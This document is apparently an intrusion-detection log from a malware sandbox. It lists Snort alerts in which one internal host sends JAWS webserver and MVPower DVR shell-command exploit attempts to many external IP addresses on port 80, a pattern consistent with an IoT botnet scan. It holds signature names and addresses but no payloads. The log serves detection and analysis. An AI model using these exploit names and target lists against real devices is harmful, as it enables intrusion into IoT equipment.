Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.10.81.41:80 -> 192.168.2.23:48230
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47938 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55762 -> 186.189.148.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38142 -> 37.19.206.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55700 -> 184.26.252.73:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39954 -> 23.15.46.102:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.15.46.102:80 -> 192.168.2.23:39954
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56364 -> 148.153.145.107:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47938 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55762 -> 186.189.148.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59908 -> 160.251.4.170:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56364 -> 148.153.145.107:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55700 -> 184.26.252.73:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.26.252.73:80 -> 192.168.2.23:55700
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59908 -> 160.251.4.170:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36840 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49266 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49266 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49266
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36840 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42736 -> 172.245.62.231:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55944 -> 78.24.213.83:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55944 -> 78.24.213.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42652 -> 103.163.195.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45918 -> 199.196.10.97:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42736 -> 172.245.62.231:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41446 -> 103.51.149.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42652 -> 103.163.195.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35602 -> 52.117.219.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41446 -> 103.51.149.81:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60654 -> 116.212.132.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35602 -> 52.117.219.197:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44846 -> 156.240.136.86:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60654 -> 116.212.132.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44846 -> 156.240.136.86:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33162 -> 82.165.68.118:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48526 -> 77.118.66.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33162 -> 82.165.68.118:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36804 -> 23.221.185.97:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46708 -> 104.16.240.1:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36804 -> 23.221.185.97:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.221.185.97:80 -> 192.168.2.23:36804
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36314 -> 178.79.132.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46708 -> 104.16.240.1:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42974 -> 72.246.67.227:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41754 -> 92.122.234.41:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57920 -> 80.78.24.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36314 -> 178.79.132.110:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59630 -> 178.154.224.180:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57868 -> 37.143.24.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57920 -> 80.78.24.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41754 -> 92.122.234.41:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.234.41:80 -> 192.168.2.23:41754
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59630 -> 178.154.224.180:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57868 -> 37.143.24.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42974 -> 72.246.67.227:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 72.246.67.227:80 -> 192.168.2.23:42974
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48456 -> 104.91.243.76:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33794 -> 34.72.161.123:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54970 -> 54.215.32.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48456 -> 104.91.243.76:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.91.243.76:80 -> 192.168.2.23:48456
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35484 -> 154.208.84.198:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33794 -> 34.72.161.123:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54970 -> 54.215.32.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35484 -> 154.208.84.198:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33316 -> 198.137.227.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49828 -> 206.237.203.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49906 -> 71.78.222.122:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36530 -> 93.124.7.241:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52904 -> 164.125.102.23:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51864 -> 13.127.48.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60572 -> 18.206.144.76:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36530 -> 93.124.7.241:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33316 -> 198.137.227.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53886 -> 163.197.10.78:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49828 -> 206.237.203.53:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49906 -> 71.78.222.122:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51864 -> 13.127.48.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44640 -> 154.83.130.140:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60572 -> 18.206.144.76:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53886 -> 163.197.10.78:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44640 -> 154.83.130.140:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36854 -> 148.251.213.163:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40264 -> 104.127.186.153:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40264 -> 104.127.186.153:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.127.186.153:80 -> 192.168.2.23:40264
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36854 -> 148.251.213.163:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36030 -> 2.20.110.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36030 -> 2.20.110.236:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.20.110.236:80 -> 192.168.2.23:36030
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56048 -> 23.4.45.116:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59824 -> 129.65.64.21:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51124 -> 14.47.155.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47938 -> 121.182.131.131:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56048 -> 23.4.45.116:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.4.45.116:80 -> 192.168.2.23:56048
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42242 -> 192.126.191.244:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54228 -> 192.177.86.65:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42242 -> 192.126.191.244:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 192.126.191.244:80 -> 192.168.2.23:42242
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47938 -> 121.182.131.131:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54228 -> 192.177.86.65:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48690 -> 163.198.23.5:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48690 -> 163.198.23.5:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 163.198.23.5:80 -> 192.168.2.23:48690
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49630 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33560 -> 145.239.179.74:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49630 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49630
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54812 -> 104.110.245.235:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43764 -> 188.215.245.201:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54812 -> 104.110.245.235:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.110.245.235:80 -> 192.168.2.23:54812
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43764 -> 188.215.245.201:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39412 -> 84.33.4.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54362 -> 23.43.198.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39412 -> 84.33.4.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58252 -> 74.114.236.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54362 -> 23.43.198.42:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.43.198.42:80 -> 192.168.2.23:54362
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42816 -> 208.73.161.59:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40864 -> 45.42.140.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58252 -> 74.114.236.42:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53672 -> 92.123.168.89:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58270 -> 110.77.231.242:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55646 -> 40.121.67.55:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40864 -> 45.42.140.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42816 -> 208.73.161.59:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55646 -> 40.121.67.55:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53672 -> 92.123.168.89:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.123.168.89:80 -> 192.168.2.23:53672
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58270 -> 110.77.231.242:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40370 -> 116.223.158.191:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40370 -> 116.223.158.191:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 116.223.158.191:80 -> 192.168.2.23:40370
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56276 -> 82.145.53.210:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55498 -> 104.66.118.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56276 -> 82.145.53.210:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55498 -> 104.66.118.40:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.66.118.40:80 -> 192.168.2.23:55498
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58738 -> 103.23.150.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60958 -> 65.23.95.68:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52378 -> 154.7.26.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47850 -> 154.210.227.149:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60958 -> 65.23.95.68:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54836 -> 210.157.8.21:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52378 -> 154.7.26.220:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47850 -> 154.210.227.149:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54836 -> 210.157.8.21:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37586 -> 107.149.36.175:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50136 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50138 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37586 -> 107.149.36.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50136 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50138 -> 13.35.34.72:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52148 -> 52.8.118.109:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55398 -> 87.241.131.132:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54648 -> 104.25.186.110:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56218 -> 163.191.144.148:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54648 -> 104.25.186.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52148 -> 52.8.118.109:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55398 -> 87.241.131.132:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32990 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32990 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:32990
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34616 -> 104.18.204.189:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34616 -> 104.18.204.189:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37852 -> 79.122.29.49:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37852 -> 79.122.29.49:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52880 -> 23.1.50.162:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52880 -> 23.1.50.162:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.1.50.162:80 -> 192.168.2.23:52880
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50822 -> 140.238.17.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37726 -> 23.219.254.140:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37726 -> 23.219.254.140:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.219.254.140:80 -> 192.168.2.23:37726
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52334 -> 107.179.98.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50822 -> 140.238.17.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52334 -> 107.179.98.103:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33038 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33038 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33038
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51310 -> 132.145.83.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51310 -> 132.145.83.236:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59810 -> 23.233.60.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39012 -> 37.251.249.22:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49550 -> 138.94.157.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55788 -> 113.61.196.114:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59810 -> 23.233.60.112:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33142 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56674 -> 23.231.96.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55788 -> 113.61.196.114:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49550 -> 138.94.157.171:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53428 -> 122.10.14.220:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56674 -> 23.231.96.186:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33142 -> 23.8.136.124:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.136.124:80 -> 192.168.2.23:33142
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53428 -> 122.10.14.220:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45504 -> 130.211.8.33:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45504 -> 130.211.8.33:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57496 -> 64.4.161.77:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57496 -> 64.4.161.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54624 -> 45.121.81.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45786 -> 18.194.219.160:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54066 -> 23.72.103.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45786 -> 18.194.219.160:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39152 -> 18.193.172.193:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60838 -> 94.130.38.180:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54066 -> 23.72.103.103:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.72.103.103:80 -> 192.168.2.23:54066
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39152 -> 18.193.172.193:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60838 -> 94.130.38.180:80
